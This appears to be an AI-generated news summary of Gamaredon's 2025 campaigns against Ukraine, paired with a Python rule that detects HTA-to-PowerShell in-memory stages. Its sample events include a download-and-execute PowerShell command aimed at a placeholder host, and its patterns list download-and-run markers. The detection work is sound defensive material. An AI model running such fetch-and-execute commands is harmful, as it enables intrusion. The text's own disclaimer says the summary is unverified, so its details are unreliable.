Gamaredon, a Russian APT group, has expanded its cyber attacks against Ukraine with new malware and tactics throughout 2025. The group has conducted 35 spear-phishing campaigns aimed at Ukrainian governmental and military institutions, focusing on exfiltrating sensitive data that could serve Russian interests in the ongoing conflict.
Gamaredon has intensified its cyber operations against Ukraine in 2025. ESET, a Slovakian cybersecurity firm, reported observing 35 distinct spear-phishing campaigns primarily targeting Ukrainian governmental and military organizations. These efforts are believed to support Russian interests amid the ongoing war.
The recent campaigns use several techniques, including HTML smuggling via archive attachments and XHTML files. Malicious HTA downloaders are deployed to drop additional payloads such as PteroSand, while some attacks exploit the now-patched WinRAR vulnerability (CVE-2025-8088) to achieve persistence.
In 2025, Gamaredon has shifted to relying more on third-party services for its operations. This includes using tunnel services and serverless platforms, which help conceal its actual back-end infrastructure, making detection and mitigation more challenging for defenders.
The group has added six new PowerShell tools to its custom malware arsenal, enhancing its capabilities. Tools like PteroDee and PteroCache focus on fetching and executing PowerShell payloads in memory, while PteroDum specializes in VBScript payloads.
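The HTA downloaders and in-memory PowerShell stages described above leave a characteristic trace on an endpoint: a script host (mshta.exe, wscript.exe, cscript.exe) spawning PowerShell whose command line fetches or evaluates code rather than running a script file. The following is an added detection example written for this article; it is not code from ESET or from the reporting it summarizes. It assumes Sysmon-style process-creation fields (parent image, image, command line), uses a constructed set of sample events, and treats its marker list as a heuristic rather than a complete signature for the PteroDee/PteroCache/PteroDum tools.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str


# Script hosts that the article describes as downloader stages (assumption: heuristic list).
SCRIPT_HOST_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line markers typical of fetching and running PowerShell code in memory.
IN_MEMORY_MARKERS = [
    re.compile(r"invoke-expression|\biex\b", re.I),
    re.compile(r"downloadstring|invoke-webrequest|\biwr\b", re.I),
    re.compile(r"-enc(?:odedcommand)?\b", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
]

# -EncodedCommand takes base64 of a UTF-16LE string; decode it so markers hidden
# inside the blob are visible to the same regexes.
ENC_ARG = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (if any) to the command line."""
    m = ENC_ARG.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return cmd
    return cmd + " " + decoded


def score_event(ev: ProcessEvent) -> list:
    """Return the list of reasons this event looks like an in-memory PowerShell stage."""
    reasons = []
    if basename(ev.parent_image) in SCRIPT_HOST_PARENTS and basename(ev.image) in POWERSHELL_IMAGES:
        reasons.append(f"script host {basename(ev.parent_image)} spawned PowerShell")
    cmd = expand_encoded(ev.command_line)
    for rx in IN_MEMORY_MARKERS:
        if rx.search(cmd):
            reasons.append(f"marker: {rx.pattern}")
    return reasons


def detect(events: list) -> list:
    """Alert when a script-host parent chain plus any marker, or two independent markers, is seen."""
    alerts = []
    for idx, ev in enumerate(events):
        reasons = score_event(ev)
        has_chain = any(r.startswith("script host") for r in reasons)
        marker_count = sum(r.startswith("marker") for r in reasons)
        if (has_chain and marker_count >= 1) or marker_count >= 2:
            alerts.append((idx, reasons))
    return alerts


# Constructed sample events (not real telemetry). "SQBFAFgA" is base64 of UTF-16LE "IEX".
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc SQBFAFgA"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe Get-ChildItem C:\Users"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for r in reasons:
            print("   -", r)
```

The two-marker fallback exists because the parent process is not always a script host (an Office macro or a scheduled task can launch the same stage), while the single-marker threshold under a script-host parent keeps the rule sensitive to the HTA-to-PowerShell chain the article describes. Tune the marker list against your own baseline of administrative PowerShell use before deploying it.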
This summary was generated by AI from the outlets' reporting listed below. It is not independently verified and may contain errors; check the original sources.